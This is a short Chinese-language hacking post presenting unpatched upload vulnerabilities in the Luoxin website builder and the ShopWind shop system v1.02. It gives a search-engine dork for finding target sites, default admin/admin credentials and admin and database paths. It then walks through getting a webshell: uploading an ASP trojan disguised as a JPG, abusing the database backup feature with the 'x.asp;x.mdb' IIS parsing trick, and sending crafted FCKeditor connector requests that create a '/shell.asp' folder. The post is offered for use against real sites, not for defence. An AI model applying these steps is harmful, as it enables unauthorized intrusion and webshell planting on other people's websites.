ShopWind网店系统与罗信网络建站 v1.02 上传漏洞

原作者: [db:作者] 来自: [db:来源] 收藏邀请

罗信网络建站系统oDAY
百度 or google "技术支持：罗信网络"
后台地址： site+lx
数据库地址： site+lx+databases+主域名.asp（需要猜测）
帐号&密码： admin admin
下来就是拿shell
重要部分：上传jpg格式的asp马
数据库备份,请注意，这里只能备份后缀为mdb格式的.
那我们怎么备份呢？
还记得之前x.asp;x.jpg格式吗？
对我们依靠这个备份格式为： x.asp;x.mdb
OK之后访问我们的备份shell
在线编辑器： site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释：官方未修补
====================YD分界线====================
ShopWind网店系统 v1.02 上传漏洞
Author：Lan3a
这个程序用的是FCKeditor 编辑器
利用2003的解析问题。直接说利用方法！
第一步：

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步：
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp